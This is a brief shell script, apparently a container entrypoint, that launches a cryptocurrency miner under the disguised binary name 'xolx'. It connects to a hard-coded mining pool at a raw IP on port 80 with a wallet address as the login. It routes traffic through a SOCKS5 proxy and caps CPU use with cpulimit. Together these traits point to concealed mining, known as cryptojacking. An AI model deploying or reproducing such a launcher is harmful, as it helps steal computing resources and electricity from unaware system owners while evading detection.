#!/bin/sh
set -e

cpulimit -l ${CPU_USAGE} -e xolx &
/usr/bin/xolx -o 131.153.142.106:80 -u TRTLv2xgnXYJBqb7BuX2MwFZg42hfNDxrK9Y7kjZBNHuZRM17sJSEvQQK8BDhb3Nra48dvXydwZEjA7gWKNwLRJpE7Rw4DXjQqJ.0000000000000000000000000000000000000000000000000000001884336411 -p XMR-NODE-PROXY --donate-level 1 -x socks5://72.206.181.105:64935 -k -t 6
